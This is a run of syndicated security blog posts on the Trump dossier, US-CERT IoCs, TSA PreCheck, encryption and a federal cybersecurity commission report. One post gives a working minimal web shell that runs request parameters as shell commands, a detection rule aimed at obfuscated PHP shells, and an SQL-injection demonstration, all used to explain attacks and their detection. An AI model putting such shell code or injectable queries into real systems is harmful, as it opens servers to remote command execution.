The world-size robot we’re building can only be managed responsibly if we start making real choices about the interconnected world we live in. Yes, we need security systems as robust as the threat landscape. But we also need laws that effectively regulate these dangerous technologies. And, more generally, we need to make moral, ethical, and political decisions on how those systems should work. Until now, we’ve largely left the internet alone. We gave programmers a special right to code cyberspace as they saw fit. This was okay because cyberspace was separate and relatively unimportant: That is, it didn’t matter. Now that that’s changed, we can no longer give programmers and the companies they work for this power. Those moral, ethical, and political decisions need, somehow, to be made by everybody. We need to link people with the same zeal that we are currently linking machines. “Connect it all” must be countered with “connect us all.”

This essay previously appeared in New York Magazine.

A Comment on the Trump Dossier

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/01/a_comment_on_th_1.html

Imagine that you are someone in the CIA, concerned about the future of America. You have this Russian dossier on Donald Trump, which you have some evidence might be true. The smartest thing you can do is to leak it to the public. By doing so, you are eliminating any leverage Russia has over Trump and probably reducing the effectiveness of any other blackmail material any government might have on Trump. I believe you do this regardless of whether you ultimately believe the document’s findings or not, and regardless of whether you support or oppose Trump. It’s simple game theory.

This document is particularly safe to release. Because it’s not a classified report of the CIA, leaking it is not a crime. And you release it now, before Trump becomes president, because doing so afterwards becomes much more dangerous.

MODERATION NOTE: Please keep comments focused on this particular point. More general comments, especially uncivil comments, will be deleted.

Some notes on IoCs

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/12/some-notes-on-iocs.html

Obama “sanctioned” Russia today for those DNC/election hacks, kicking out 35 diplomats (**), closing diplomatic compounds (**), seizing assets of named individuals/groups (***). They also published “IoCs” of those attacks, fingerprints/signatures that point back to the attackers, like virus patterns, file hashes, and IP addresses.

These IoCs are of low quality. They are published as a political tool, to prove they have evidence pointing to Russia. They have limited utility to defenders, or those publicly analyzing attacks.

Consider the Yara rule included in US-CERT’s “GRIZZLY STEPPE” announcement:

What is this? What does this mean? What do I do with this information?

It’s a YARA rule. YARA is a tool ostensibly for malware researchers, used to quickly classify files. It’s not really an anti-virus product designed to prevent or detect an intrusion/infection; it’s for analyzing an intrusion/infection afterward — such as attributing the attack. Signatures like this will identify a well-known file found on infected/hacked systems.

What this YARA rule detects is, as the name suggests, the “PAS TOOL WEB KIT”, a web shell tool that’s popular among Russia/Ukraine hackers. If you google “PAS TOOL PHP WEB KIT”, the second result points to the tool in question. You can download a copy here [*], or you can view it on GitHub here [*].
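The rule itself doesn’t reproduce well in this post, but the mechanics are easy to sketch. Below is a rough Python stand-in for how a YARA-style signature works: a named set of byte patterns plus an “all of them” condition. The patterns here are placeholders I made up for illustration, not the actual strings from the US-CERT rule.

```python
import re

# Illustrative stand-in for a YARA-style rule: a named set of patterns,
# with an "all of them" condition. These patterns are placeholders,
# NOT the actual strings from the US-CERT GRIZZLY STEPPE rule.
PAS_TOOL_RULE = {
    "name": "PAS_TOOL_PHP_WEB_KIT_demo",
    "patterns": [
        rb"<\?php",         # PHP open tag
        rb"base64_decode",  # encoded payload is decoded at runtime...
        rb"gzinflate",      # ...then decompressed...
        rb"\$_POST\[",      # ...with the password arriving via POST
    ],
}

def matches(rule, data: bytes) -> bool:
    """Return True if every pattern in the rule is found in the file body."""
    return all(re.search(p, data) for p in rule["patterns"])

sample = b'<?php eval(gzinflate(base64_decode($_POST["p"]))); ?>'
print(matches(PAS_TOOL_RULE, sample))  # True
```

A real YARA rule adds metadata, string modifiers, and a richer condition language, but the core idea is the same: classify a file by the presence of a handful of characteristic byte patterns.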

Once a hacker gets comfortable with a tool, they tend to keep using it. That implies the YARA rule is useful at tracking the activity of that hacker, to see which other attacks they’ve been involved in, since it will find the same web shell on all the victims.

The problem is that this P.A.S. web shell is popular, used by hundreds if not thousands of hackers, mostly associated with Russia, but also throughout the rest of the world (judging by hacker forum posts). This makes using the YARA signature for attribution problematic: just because you found P.A.S. in two different places doesn’t mean it’s the same hacker.

A web shell, by the way, is one of the most common things hackers use once they’ve broken into a server. It allows further hacking and exfiltration traffic to appear as normal web requests. It typically consists of a script file (PHP, ASP, PERL, etc.) that forwards commands to the local system. There are hundreds of popular web shells in use.
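To make the “commands as normal web requests” point concrete, here is a minimal Python sketch of the core of any web shell (my illustration, not the P.A.S. code): a request parameter is executed as a local command, and its output comes back as an ordinary-looking response body.

```python
import subprocess
from urllib.parse import parse_qs

# Minimal core of a web shell: a request parameter is executed as a local
# command and its output is returned as the response body. Real shells
# (PHP/ASP/Perl) add password checks, obfuscation, and file management
# on top of exactly this primitive.
def handle_query(query_string: str) -> str:
    params = parse_qs(query_string)
    cmd = params.get("cmd", [""])[0]
    if not cmd:
        return ""
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout

print(handle_query("cmd=echo+hello"), end="")  # prints "hello"
```

From the web server’s point of view, each command is just one more GET or POST to a script that happens to live in the document root, which is why this traffic blends in so well.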

We have little visibility into how the government used these IoCs. IP addresses and YARA rules like this are weak, insufficient for attribution by themselves. On the other hand, if they’ve got web server logs from multiple victims where commands from those IP addresses went to this specific web shell, then the attribution would be strong that all these attacks are by the same actor.

In other words, these rules can be a reflection of the fact the government has excellent information for attribution. Or, it could be a reflection that they’ve got only weak bits and pieces. It’s impossible for us outsiders to tell. IoCs/signatures are fetishized in the cybersecurity community: they love the small rule, but they ignore the complexity and context around the rules, often misunderstanding what’s going on. (I’ve written thousands of the things — I’m constantly annoyed by the ignorance among those not understanding what they mean).

I see on twitter people praising the government for releasing these IoCs. What I’m trying to show here is that I’m not nearly as enthusiastic about their quality.


Note#1: BTW, the YARA rule has to trigger on the PHP statements, not on the embedded BASE64 encoded stuff. That’s because it’s encrypted with a password, so could be different for every hacker.

Note#2: Yes, the hackers who use this tool can evade detection by minor changes that avoid this YARA rule. But that’s not a concern — the point is to track the hacker using this tool across many victims, to attribute attacks. The point is not to act as an anti-virus/intrusion-detection system that triggers on “signatures”.

Note#3: Publishing the YARA rule burns it. The hackers it detects will presumably move to different tools, like PASv4 instead of PASv3. Presumably, the FBI/NSA/etc. have a variety of YARA rules for various web shells used by known active hackers, to attribute attacks to various groups. They aren’t publishing these because they want to avoid burning those rules.

Note#4: The PDF from the DHS has pretty diagrams about the attacks, but it doesn’t appear this web shell was used in any of them. It’s difficult to see where it fits in the overall picture.


(**) No, not really. Apparently, kicking out the diplomats was punishment for something else, not related to the DNC hacks.

(***) It’s not clear if these “sanctions” have any teeth.

Security Risks of TSA PreCheck

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2016/12/security_risks_12.html

Former TSA Administrator Kip Hawley wrote an op-ed pointing out the security vulnerabilities in the TSA’s PreCheck program:

The first vulnerability in the system is its enrollment process, which seeks to verify an applicant’s identity. We know verification is a challenge: A 2011 Government Accountability Office report on TSA’s system for checking airport workers’ identities concluded that it was “not designed to provide reasonable assurance that only qualified applicants” got approved. It’s not a stretch to believe a reasonably competent terrorist could construct an identity that would pass PreCheck’s front end.

The other step in PreCheck’s “intelligence-driven, risk-based security strategy” is absurd on its face: The absence of negative information about a person doesn’t mean he or she is trustworthy. News reports are filled with stories of people who seemed to be perfectly normal right up to the moment they committed a heinous act. There is no screening algorithm and no database check that can accurately predict human behavior — especially on the scale of millions. It is axiomatic that terrorist organizations recruit operatives who have clean backgrounds and interview well.

None of this is news.

Back in 2004, I wrote:

Imagine you’re a terrorist plotter with half a dozen potential terrorists at your disposal. They all apply for a card, and three get one. Guess which are going on the mission? And they’ll buy round-trip tickets with credit cards and have a “normal” amount of luggage with them.

What the Trusted Traveler program does is create two different access paths into the airport: high security and low security. The intent is that only good guys will take the low-security path, and the bad guys will be forced to take the high-security path, but it rarely works out that way. You have to assume that the bad guys will find a way to take the low-security path.

The Trusted Traveler program is based on the dangerous myth that terrorists match a particular profile and that we can somehow pick terrorists out of a crowd if we only can identify everyone. That’s simply not true. Most of the 9/11 terrorists were unknown and not on any watch list. Timothy McVeigh was an upstanding US citizen before he blew up the Oklahoma City Federal Building. Palestinian suicide bombers in Israel are normal, nondescript people. Intelligence reports indicate that Al Qaeda is recruiting non-Arab terrorists for US operations.

I wrote much the same thing in 2007:

Background checks are based on the dangerous myth that we can somehow pick terrorists out of a crowd if we could identify everyone. Unfortunately, there isn’t any terrorist profile that prescreening can uncover. Timothy McVeigh could probably have gotten one of these cards. So could have Eric Rudolph, the pipe bomber at the 1996 Olympic Games in Atlanta. There isn’t even a good list of known terrorists to check people against; the government list used by the airlines has been the butt of jokes for years.

And have we forgotten how prevalent identity theft is these days? If you think having a criminal impersonating you to your bank is bad, wait until they start impersonating you to the Transportation Security Administration.

The truth is that whenever you create two paths through security — a high-security path and a low-security path — you have to assume that the bad guys will find a way to exploit the low-security path. It may be counterintuitive, but we are all safer if the people chosen for more thorough screening are truly random and not based on an error-filled database or a cursory background check.

In a companion blog post, Hawley has more details about why the program doesn’t work:

In the sense that PreCheck bars people who were identified by intelligence or law enforcement agencies as possible terrorists, then it was intelligence-driven. But using that standard for PreCheck is ridiculous since those people already get extra screening or are on the No-Fly list. The movie Patriots Day, out now, reminds us of the tragic and preventable Boston Marathon bombing. The FBI sent agents to talk to the Tsarnaev brothers and investigate them as possible terror suspects. And cleared them. Even they did not meet the “intelligence-driven” definition used in PreCheck.

The other problem with “intelligence-driven” in the PreCheck context is that intelligence actually tells us the opposite; specifically that terrorists pick clean operatives. If TSA uses current intelligence to evaluate risk, it would not be out enrolling everybody they can into pre-9/11 security for everybody not flagged by the security services.

Hawley and I may agree on the problem, but we have completely opposite solutions. The op-ed was too short to include details, but they’re in a companion blog post. Basically, he wants to screen PreCheck passengers more:

In the interests of space, I left out details of what I would suggest as short- and medium-term solutions. Here are a few ideas:

  • Immediately scrub the PreCheck enrollees for false identities. That can probably be accomplished best and most quickly by getting permission from members and then using commercial data. If the results show that PreCheck has already been penetrated, the program should be suspended.

  • Deploy K-9 teams at PreCheck lanes.

  • Use behaviorally trained officers to interact with and check the credentials of PreCheck passengers.

  • Use Explosives Trace Detection cotton swabs on PreCheck passengers at a much higher rate. Same with removing shoes.

  • Turn on the body scanners and keep them fully utilized.

  • Allow liquids to stay in the carry-on since TSA scanners can detect threat liquids.

  • Work with the airlines to keep the PreCheck experience positive.

  • Work with airports to place PreCheck lanes away from regular checkpoints so as not to diminish lane capacity for non-PreCheck passengers. Rental Car check-in areas could be one alternative. Also, downtown check-in and screening (with secure transport to the airport) is a possibility.

These solutions completely ignore the data from the real-world experiment PreCheck has been. Hawley writes that PreCheck tells us that “terrorists pick clean operatives.” That’s exactly wrong. PreCheck tells us that, basically, there are no terrorists. If 1) it’s an easier way through airport security that terrorists will invariably use, and 2) there have been no instances of terrorists using it in the 10+ years it and its predecessors have been in operation, then the inescapable conclusion is that the threat is minimal. Instead of screening PreCheck passengers more, we should screen everybody else less. This is me in 2012: “I think the PreCheck level of airport screening is what everyone should get, and that the no-fly list and the photo ID check add nothing to security.”
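One way to put a rough number on that inference (my back-of-the-envelope illustration, not the author’s math): with zero attacks observed over n independent opportunities, the statistical “rule of three” gives an approximate 95% upper bound of 3/n on the per-opportunity attack probability. The screening count below is an assumption for illustration only.

```python
# "Rule of three": with n trials and zero observed events, 3/n is an
# approximate 95% upper confidence bound on the per-trial event probability.
def rule_of_three_upper_bound(n_trials: int) -> float:
    return 3.0 / n_trials

# Assumed: hundreds of millions of PreCheck-style screenings over a decade.
n = 500_000_000
print(f"{rule_of_three_upper_bound(n):.1e}")  # 6.0e-09 per screening
```

Even with generous error bars on n, the bound is vanishingly small, which is the point: the observed threat does not justify screening PreCheck passengers more, as opposed to screening everyone else less.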

I agree with Hawley that we need to overhaul airport security. Me in 2010: “Airport security is the last line of defense, and it’s not a very good one.” We need to recognize that the actual risk is much lower than we fear, and ratchet airport security down accordingly. And then we need to continue to invest in investigation and intelligence: security measures that work regardless of the tactic or target.

The Year Encryption Won (Wired)

Post Syndicated from jake original http://lwn.net/Articles/710093/rss

It’s not entirely clear that the title is justified, but Wired does cover some progress on the encryption front in 2016. “End-to-end encryption, which ensures that the only people who can see your communications are you and the person on the receiving end, certainly isn’t new. But in 2016, encryption went mainstream, reaching billions of people all over the world. Even more significantly, it overcame its most aggressive legal challenge yet, in a prolonged standoff between Apple and the FBI. And just this week, a Congressional committee affirmed the importance of encryption, giving hope that future laws around the topic will include at least a modicum of sanity.

There’s still a long way to go, and any gains that were made could potentially be rolled back, but for now it’s worth taking a step back to appreciate just how far encryption came this year. As far as silver linings go, you could do a lot worse.”

MPAA Takes Credit for The Shutdown of KickassTorrents

Post Syndicated from Ernesto original https://torrentfreak.com/mpaa-takes-credit-for-the-shutdown-of-kickasstorrents-161215/

This summer the U.S. Government shut down KickassTorrents, which was then the largest torrent site on the Internet.

The complaint was the result of an elaborate FBI investigation, identifying Ukrainian Artem Vaulin as one of the alleged masterminds.

However, it turns out that it wasn’t just the U.S. Government who put the pieces together. There’s another major force behind the shutdown that hasn’t been mentioned thus far.

MPAA boss Chris Dodd suggests that the Hollywood group also played a key role in the case. Their international arm, the MPA, is headquartered in Europe from where it actively helped the U.S. authorities to shut down KickassTorrents.

“We have now established a global hub — an office in Brussels. It has been tremendously successful in closing down Kickass Torrents, the single largest pirate site in the world,” Dodd told Variety in an interview.

The major movie studios have helped in similar criminal cases before, so this doesn’t come as a complete surprise. Generally speaking, however, the MPAA is not particularly open about the role it plays in federal investigations.

Although the takedown of KickassTorrents was a major success for Hollywood, piracy remains a problem. It’s even come to a point where Dodd himself is using the “hydra” terminology, which The Pirate Bay’s crew first brought up a decade ago.

The MPAA says that successes are still being achieved every day, but they require more sophisticated methods than were used in the past.

“We make great inroads, but it is a problem that isn’t going away. Some days I do feel it is hydra-headed. But in the past few years, we have developed a more sophisticated and efficient way of dealing with piracy issues.”

At the same time, however, the pirates are getting smarter as well.

Over the years, operators of sites and services have found better ways to shield themselves from law enforcement, while making it easier for their users to consume content. While Dodd has a positive outlook, he recognizes the challenges that lie ahead.

“I am feeling more optimistic, but the pirates are getting more sophisticated. Technology not only is increasing our opportunity for more people to consume our content, but technology is also making it possible for people to steal our content, and it is not insignificant,” he concludes.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

My Priorities for the Next Four Years

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2016/12/my_priorities_f.html

Like many, I was surprised and shocked by the election of Donald Trump as president. I believe his ideas, temperament, and inexperience represent a grave threat to our country and world. Suddenly, all the things I had planned to work on seemed trivial in comparison. Although Internet security and privacy are not the most important policy areas at risk, I believe he — and, more importantly, his cabinet, administration, and Congress — will have devastating effects in that area, both in the US and around the world.

The election was so close that I’ve come to see the result as a bad roll of the dice. A few minor tweaks here and there — a more enthusiastic Sanders endorsement, one fewer of Comey’s announcements, slightly less Russian involvement — and the country would be preparing for a Clinton presidency and discussing a very different social narrative. That alternative narrative would stress business as usual, and continue to obscure the deep social problems in our society. Those problems won’t go away on their own, and in this alternative future they would continue to fester under the surface, getting steadily worse. This election exposed those problems for everyone to see.

I spent the last month both coming to terms with this reality, and thinking about the future. Here is my new agenda for the next four years:

One, fight the fights. There will be more government surveillance and more corporate surveillance. I expect legislative and judicial battles along several lines: a renewed call from the FBI for backdoors into encryption, more leeway for government hacking without a warrant, no controls on corporate surveillance, and more secret government demands for that corporate data. I expect other countries to follow our lead. (The UK is already more extreme than us.) And if there’s a major terrorist attack under Trump’s watch, it’ll be open season on our liberties. We may lose a lot of these battles, but we need to lose as few as possible and as little of our existing liberties as possible.

Two, prepare for those fights. Much of the next four years will be reactive, but we can prepare somewhat. The more we can convince corporate America to delete their saved archives of surveillance data and to store only what they need for as long as they need it, the safer we’ll all be. We need to convince Internet giants like Google and Facebook to change their business models away from surveillance capitalism. It’s a hard sell, but maybe we can nibble around the edges. Similarly, we need to keep pushing the truism that privacy and security are not antagonistic, but rather are essential for each other.

Three, lay the groundwork for a better future. No matter how bad the next four years get, I don’t believe that a Trump administration will permanently end privacy, freedom, and liberty in the US. I don’t believe that it portends a radical change in our democracy. (Or if it does, we have bigger problems than a free and secure Internet.) It’s true that some of Trump’s institutional changes might take decades to undo. Even so, I am confident — optimistic even — that the US will eventually come around; and when that time comes, we need good ideas in place for people to come around to. This means proposals for non-surveillance-based Internet business models, research into effective law enforcement that preserves privacy, intelligent limits on how corporations can collect and exploit our data, and so on.

And four, continue to solve the actual problems. The serious security issues around cybercrime, cyber-espionage, cyberwar, the Internet of Things, algorithmic decision making, foreign interference in our elections, and so on aren’t going to disappear for four years while we’re busy fighting the excesses of Trump. We need to continue to work towards a more secure digital future. And to the extent that cybersecurity for our military networks and critical infrastructure aligns with cybersecurity for everyone, we’ll probably have an ally in Trump.

Those are my four areas. Under a Clinton administration, my list would have looked much the same. Trump’s election just means the threats will be much greater, and the battles a lot harder to win. It’s more than I can possibly do on my own, and I am therefore substantially increasing my annual philanthropy to support organizations like EPIC, EFF, ACLU, and Access Now in continuing their work in these areas.

My agenda is necessarily focused entirely on my particular areas of concern. The risks of a Trump presidency are far more pernicious, but this is where I have expertise and influence.

Right now, we have a defeated majority. Many are scared, and many are motivated — and few of those are applying their motivation constructively. We need to harness that fear and energy to start fixing our society now, instead of waiting four or even eight years, at which point the problems would be worse and the solutions more extreme. I am choosing to proceed as if this were cowpox, not smallpox: fighting the more benign disease today will be much easier than subjecting ourselves to its more virulent form in the future. It’s going to be hard keeping the intensity up for the next four years, but we need to get to work. Let’s use Trump’s victory as the wake-up call and opportunity that it is.

That "Commission on Enhancing Cybersecurity" is absurd

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/12/that-commission-on-enhancing.html

An Obama commission has published a report on how to “Enhance Cybersecurity”. It’s promoted as having been written by neutral, bipartisan, technical experts. Instead, it’s almost entirely dominated by special interests and the Democrat politics of the outgoing administration.

In this post, I’m going through a random sample of the 53 “action items” proposed by the document. I show how they are policy issues, not technical issues. Indeed, much of the time the technical details are warped to conform to special interests.

IoT passwords

The recommendations include such things as Action Item 2.1.4:

Initial best practices should include requirements to mandate that IoT devices be rendered unusable until users first change default usernames and passwords. 

This recommendation for changing default passwords is repeated many times. It comes from the way the Mirai worm exploits devices by using hardcoded/default passwords.

But this is a misunderstanding of how these devices work. Take, for example, the infamous Xiongmai camera. It has user accounts on the web server to control the camera. If the user forgets the password, the camera can be reset to factory defaults by pressing a button on the outside of the camera.

But here’s the deal with security cameras. They are placed at remote sites miles away, up on the second story where people can’t mess with them. In order to reset them, you need to put a ladder in your truck and drive 30 minutes out to the site, then climb the ladder (an inherently dangerous activity). Therefore, Xiongmai provides a RESET.EXE utility for remotely resetting them. That utility happens to connect via Telnet using a hardcoded password.

The above report misunderstands what’s going on here. It sees Telnet and a hardcoded password, and makes assumptions. Some people assume that this is the normal user account — it’s not, it’s unrelated to the user accounts on the web server portion of the device. Requiring the user to change the password on the web service would have no effect on the Telnet service. Other people assume the Telnet service is accidental, that good security hygiene would remove it. Instead, it’s an intended feature of the product, to remotely reset the device. Fixing the “password” issue as described in the above recommendations would simply mean the manufacturer would create a different, custom backdoor that hackers would eventually reverse engineer, creating a MiraiV2 botnet. Instead of banning backdoors, security guides need to come up with a standard for remote reset.

That characterization of Mirai as an IoT botnet is wrong. Mirai is a botnet of security cameras. Security cameras are fundamentally different from IoT devices like toasters and fridges because they are often exposed to the public Internet. To stream video on your phone from your security camera, you need a port open on the Internet. Non-camera IoT devices, however, are overwhelmingly protected by a firewall, with no exposure to the public Internet. While you can create a botnet of Internet cameras, you cannot create a botnet of Internet toasters.

The point I’m trying to demonstrate here is that the above report was written by policy folks with little grasp of the technical details of what’s going on. They use Mirai to justify several of their “Action Items”, none of which actually apply to the technical details of Mirai. It has little to do with IoT, passwords, or hygiene.

Public-private partnerships

Action Item 1.2.1: The President should create, through executive order, the National Cybersecurity Private–Public Program (NCP3) as a forum for addressing cybersecurity issues through a high-level, joint public–private collaboration.

We’ve had public-private partnerships to secure cyberspace for over 20 years, such as the FBI InfraGard partnership. President Clinton had a plan in 1998 to create a public-private partnership to address cyber vulnerabilities. President Bush declared public-private partnerships the “cornerstone” of his 2003 plan to secure cyberspace.

Here we are 20 years later, and this document is full of new naive proposals for public-private partnerships. There’s no analysis of why they have failed in the past, or discussion of which ones have succeeded.

The many calls for public-private programs reflect the left-wing nature of this supposed “bipartisan” document, which sees government as a paternalistic entity that can help. The right-wing doesn’t believe the government provides any value in these partnerships. In my 20 years of experience with government public-private partnerships in cybersecurity, I’ve found them to be a time waster at best and, at worst, a way to coerce “voluntary measures” out of companies that hurt the public’s interest.

Build a wall and make China pay for it

Action Item 1.3.1: The next Administration should require that all Internet-based federal government services provided directly to citizens require the use of appropriately strong authentication.

This would cost at least $100 per person, for 300 million people, or $30 billion. In other words, it’ll cost more than Trump’s wall with Mexico.

Hardware tokens are cheap. Blizzard (a popular gaming company) must deal with widespread account hacking from “gold sellers”, and provides second factor authentication to its gamers for $6 each. But that ignores the enormous support costs involved. How does a person prove their identity to the government in order to get such a token? To replace a lost token? When old tokens break? What happens if somebody’s token is stolen?

And that’s the best case scenario. Other options, like using cellphones as a second factor, are non-starters.

This is actually not a bad recommendation, as far as government services are involved, but it ignores the costs and difficulties involved.

But then the recommendations go on to suggest this for private sector as well:

Specifically, private-sector organizations, including top online retailers, large health insurers, social media companies, and major financial institutions, should use strong authentication solutions as the default for major online applications.

No, no, no. There is no reason for a “top online retailer” to know your identity. I lie about my identity. Amazon.com thinks my name is “Edward Williams”, for example.

They get worse with:

Action Item 1.3.3: The government should serve as a source to validate identity attributes to address online identity challenges.

In other words, they are advocating a cyber-dystopic police-state wet-dream where the government controls everyone’s identity. We already see how this fails with Facebook’s “real name” policy, where everyone from political activists in other countries to LGBTQ people in this country gets harassed for revealing their real names.

Anonymity and pseudonymity are precious rights on the Internet that we now enjoy — rights endangered by the radical policies in this document. This document frequently claims to promote security “while protecting privacy”. But the government doesn’t protect privacy — much of what we want from cybersecurity is to protect our privacy from government intrusion. This is nothing new, you’ve heard this privacy debate before. What I’m trying to show here is that the one-sided view of privacy in this document demonstrates how it’s dominated by special interests.

Cybersecurity Framework

Action Item 1.4.2: All federal agencies should be required to use the Cybersecurity Framework. 

The “Cybersecurity Framework” is a bunch of nonsense that would require another long blogpost to debunk. It requires months of training and years of experience to understand. It contains things like “DE.CM-4: Malicious code is detected”, as if that’s a thing organizations are able to do.

All the while it ignores the most common cyber attacks (SQL/web injections, phishing, password reuse, DDoS). It’s a typical example where organizations spend enormous amounts of money following process while getting no closer to solving what the processes are attempting to solve. Federal agencies using the Cybersecurity Framework are no safer from my pentests than those who don’t use it.

It gets even crazier:

Action Item 1.5.1: The National Institute of Standards and Technology (NIST) should expand its support of SMBs in using the Cybersecurity Framework and should assess its cost-effectiveness specifically for SMBs.

Small businesses can’t even afford to read the “Cybersecurity Framework”. Simply reading the document and trying to understand it would exceed their entire IT/computer budget for the year. It would take a high-priced consultant earning $500/hour to tell them that “DE.CM-4: Malicious code is detected” means “buy antivirus and keep it up to date”.

Software liability is a hoax invented by the Chinese to make our IoT less competitive

Action Item 2.1.3: The Department of Justice should lead an interagency study with the Departments of Commerce and Homeland Security and work with the Federal Trade Commission, the Consumer Product Safety Commission, and interested private sector parties to assess the current state of the law with regard to liability for harm caused by faulty IoT devices and provide recommendations within 180 days. 

For over a decade, leftists in the cybersecurity industry have been pushing the concept of “software liability”. Every time there is a major new development in hacking, such as the worms around 2003, they come out with documents explaining why there’s a “market failure” and that we need liability to punish companies to fix the problem. Then the problem is fixed, without software liability, and the leftists wait for some new development to push the theory yet again.

It’s especially absurd for the IoT marketspace. The harm, as they imagine, is DDoS. But the majority of devices in Mirai were sold by non-US companies to non-US customers. There’s no way US regulations can stop that.

What US regulations will stop is IoT innovation in the United States. Regulations are so burdensome, and liability lawsuits so punishing, that they will kill all innovation within the United States. If you want to get rich with a clever IoT Kickstarter project, forget about it: your entire development budget will go to cybersecurity. The only companies that will be able to afford to ship IoT products in the United States will be large industrial concerns like GE that can afford the overhead of regulation/liability.

Liability is a left-wing policy issue, not one supported by technical analysis. Software liability has proven to be immaterial in any past problem and current proponents are distorting the IoT market to promote it now.

Cybersecurity workforce

Action Item 4.1.1: The next President should initiate a national cybersecurity workforce program to train 100,000 new cybersecurity practitioners by 2020. 

The problem in our industry isn’t the lack of “cybersecurity practitioners”, but the overabundance of “insecurity practitioners”.

Take “SQL injection” as an example. It’s been the most common way hackers break into websites for 15 years. It happens because programmers, those building web-apps, blindly paste input into SQL queries. They do that because they’ve been trained to do it that way. All the textbooks on how to build webapps teach them this. All the examples show them this.
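The bad habit, and its one-line fix, can be shown in a few lines of Python (a minimal sketch using the standard library’s sqlite3 module; the table and the attack string are invented for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'hunter2')")

name = "alice' OR '1'='1"  # attacker-controlled input

# The pattern the textbooks teach: paste the input straight into the
# query string. The attacker's quote characters become part of the SQL,
# so this matches every row in the table.
injected = conn.execute(
    "SELECT secret FROM users WHERE name = '%s'" % name
).fetchall()

# The fix: a parameterized query. The driver passes the input as data,
# never as SQL, so the same attack string matches nothing.
safe = conn.execute(
    "SELECT secret FROM users WHERE name = ?", (name,)
).fetchall()
```

The parameterized version is no harder to write than the vulnerable one, which is the point: the textbooks could just as easily teach the safe habit.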

So you have government programs on one hand pushing tech education, teaching kids to build web-apps with SQL injection. Then you propose to train a second group of people to fix the broken stuff the first group produced.

The solution to SQL/website injections is not more practitioners, but stopping programmers from creating the problems in the first place. The solution to phishing is to use the tools already built into Windows and networks that sysadmins use, not adding new products/practitioners. These are the two most common problems, and they happen not because of a lack of cybersecurity practitioners, but because the lack of cybersecurity as part of normal IT/computers.

I point this out to demonstrate yet again that the document was written by policy people with little or no technical understanding of the problem.

Nutritional label

Action Item 3.1.1: To improve consumers’ purchasing decisions, an independent organization should develop the equivalent of a cybersecurity “nutritional label” for technology products and services—ideally linked to a rating system of understandable, impartial, third-party assessment that consumers will intuitively trust and understand. 

This can’t be done. Grab some IoT devices, like my thermostat, my car, or a Xiongmai security camera used in the Mirai botnet. These devices are so complex that no “nutritional label” can be made from them.

One of the things you’d like to know is all the software dependencies, so that if there’s a bug in OpenSSL, for example, then you know your device is vulnerable. Unfortunately, that requires a nutritional label with 10,000 items on it.

Or, one thing you’d want to know is that the device has no backdoor passwords. But that would miss the Xiongmai devices. The web service has no backdoor passwords. If you caught the Telnet backdoor password and removed it, then you’d miss the special secret backdoor that hackers would later reverse engineer.

This is a policy position chasing a non-existent technical issue, pushed by Peiter Zatko, who has gotten hundreds of thousands of dollars in government grants to push it. It’s his way of getting rich and has nothing to do with sound policy.

Cyberczars and ambassadors

Various recommendations call for the appointment of various CISOs, Assistant to the President for Cybersecurity, and an Ambassador for Cybersecurity. But nowhere does it mention these should be technical posts. This is like appointing a Surgeon General who is not a doctor.

Government’s problems with cybersecurity stem from the way technical knowledge is so disrespected. The current cyberczar prides himself on his lack of technical knowledge, because that helps him see the bigger picture.

Ironically, many of the other Action Items are about training cybersecurity practitioners, employees, and managers. None of this can happen as long as leadership is clueless. Technical details matter, as I show above with the Mirai botnet. Subtlety and nuance in technical details can call for opposite policy responses.

Conclusion

This document is promoted as being written by technical experts. However, nothing in the document is neutral technical expertise. Instead, it’s almost entirely a policy document dominated by special interests and left-wing politics. In many places it makes recommendations to the incoming Republican president. His response should be to round-file it immediately.

I only chose a few items, as this blogpost is long enough as it is. I could pick almost any of the 53 Action Items to demonstrate how they are policy- and special-interest-driven rather than reflecting technical expertise.

No, it’s Matt Novak who is a fucking idiot

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/11/no-its-matt-novak-who-is-fucking-idiot.html

I keep seeing this Gizmodo piece entitled “Snowden is a fucking idiot”. I understand the appeal of the piece. The hero worship of Edward Snowden is getting old. But the piece itself is garbage.

The author, Matt Novak, is of the new wave of hard-core leftists intolerant of those who disagree with them. His position is that everyone is an idiot who doesn’t agree with his views: Libertarians, Republicans, moderate voters who chose Trump, and even fellow left-wingers that aren’t as hard-core.

If you carefully read his piece, you’ll see that Novak doesn’t actually prove Snowden is wrong. Novak doesn’t show how Snowden disagrees with facts, but only how Snowden disagrees with the left-wing view of the world, “libertarian garbage” as Novak puts it. It’s only through deduction that we come to the conclusion: those who aren’t left-wing are idiots, Snowden is not left-wing, therefore Snowden is an idiot.

The question under debate in the piece is:

technology is more important than policy as a way to protect our liberties

In other words, if you don’t want the government spying on you, then focus on using encryption (use Signal) rather than trying to change the laws so they can’t spy on you.

On a factual basis (rather than political), Snowden is right. If you live in Germany and don’t want the NSA spying on you there is little policy-wise that you can do about it, short of convincing Germany to go to war against the United States to get the US to stop spying.

Likewise, for all those dissenters in countries with repressive regimes, technology precedes policy. You can’t effect change until you can first protect yourselves from the state police who throw you in jail for dissenting. Use Signal.

In our own country, Snowden is right about “politics”. Snowden’s leak showed how the NSA was collecting everyone’s phone records to stop terrorism. Privacy organizations like the EFF supported the reform bill, the USA FREEDOM ACT. But rather than stopping the practice, the “reform” opened up the phone records to all law enforcement (FBI, DEA, ATF, IRS, etc.) for normal law enforcement purposes.

Imagine the protestors out there opposing the Dakota Access Pipeline. The FBI is shooting down their drones and blasting them with water cannons. Now, because of the efforts of the EFF and other privacy activists, using the USA FREEDOM ACT, the FBI is also grabbing everyone’s phone records in the area. Ask yourself who is the fucking idiot here: the guy telling you to use Signal, or the guy telling you to focus on “politics” to stop this surveillance.

Novak repeats the hard-left version of the creation of the Internet:

The internet has always been monitored by the state. It was created by the fucking US military and has been monitored from day one. Surveillance of the internet wasn’t invented after September 11, 2001, no matter how many people would like to believe that to be the case.

